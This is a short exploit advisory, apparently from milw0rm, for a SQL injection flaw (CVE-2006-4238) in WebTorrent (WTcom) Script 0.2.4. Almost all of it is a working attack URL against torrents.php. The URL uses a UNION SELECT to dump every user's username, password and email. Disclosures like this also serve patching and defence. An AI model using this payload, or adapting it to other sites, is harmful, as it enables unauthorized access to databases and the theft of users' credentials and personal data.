WTcom 0.2.4-alpha - 'torrents.php' SQL Injection

Related Vulnerabilities: CVE-2006-4238  
Publish Date: 17 Aug 2006
Author: sh1r081
                							

                # WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# milw0rm.com [2006-08-17]